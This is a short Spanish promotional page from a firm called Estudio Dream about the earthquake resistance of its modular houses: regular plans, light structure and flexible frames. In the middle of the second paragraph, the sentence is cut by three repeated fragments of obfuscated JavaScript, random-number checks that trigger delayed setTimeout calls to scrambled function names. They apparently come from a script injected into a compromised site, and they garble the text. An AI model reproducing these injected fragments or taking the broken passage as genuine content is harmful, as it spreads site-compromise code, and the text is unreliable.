Casas modulares resistentes

Los módulos con los que fabricamos las viviendas en Estudio Dream tienen tres principios básicos que las hacen únicas y seguras hasta en las circunstancias más extremas.

El primero es que tienen una forma regular, sin formas asimétricas o complejas porque cuanto más cuanto más sencilla sea la planta menos probabilidades hay de que la estructura sufra torsión en caso de seísmo.

En segundo es el bajo peso de su estructura. Cuanto más liviana sea la edificación menos fuerza tendrá que soportar en caso de que la tierra tiemble. Si la cubierta de la vivienda pesa mucho esto hará que toda la estructura se balancee como un péndulo invertido afectandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando a los cimientos que la soportan.

Y por último tienen una estructura flexible que se deformará muy poco en caso de que haya un seísmo. Esto es importante porque las paredes no sufrirán daños o grietas y las deformaciones no causarán graves consecuencias para la estructura de la vivienda.

Cali-arquitectura

vivienda-madera

 

Comments : 0

Deja un comentario